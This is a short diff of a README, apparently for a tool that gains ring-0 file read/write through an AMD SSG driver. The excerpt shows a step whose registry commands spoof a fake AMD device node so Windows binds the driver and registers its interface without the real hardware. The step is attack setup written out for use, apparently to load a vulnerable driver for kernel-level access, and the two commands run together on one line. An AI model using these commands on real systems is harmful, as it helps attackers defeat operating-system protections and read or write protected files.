Syscallh00k/AMDSSG-Ring0-File-R-W/README.md

 ```

 ### Step 3 — Spoof the AMD SSG Device Node
 The driver is a PnP driver — it will only create its device interface when Windows enumerates a matching hardware device.
-Without an actual AMD Radeon SSG card, you need to create a fake device node in the registry so PnP binds the driver:
+Without an actual AMD Radeon SSG card, you need to create a fake device node in the registry so PnP binds the driver and registers the device interface:
 ```
 reg add "HKLM\SYSTEM\CurrentControlSet\Enum\Root\SYSTEM\0001" /v HardwareID /t REG_MULTI_SZ /d "PCI\VEN_1002&DEV_7300&REV_CC" /f reg add "HKLM\SYSTEM\CurrentControlSet\Enum\Root\SYSTEM\0001" /v Service /t REG_SZ /d "SSG" /f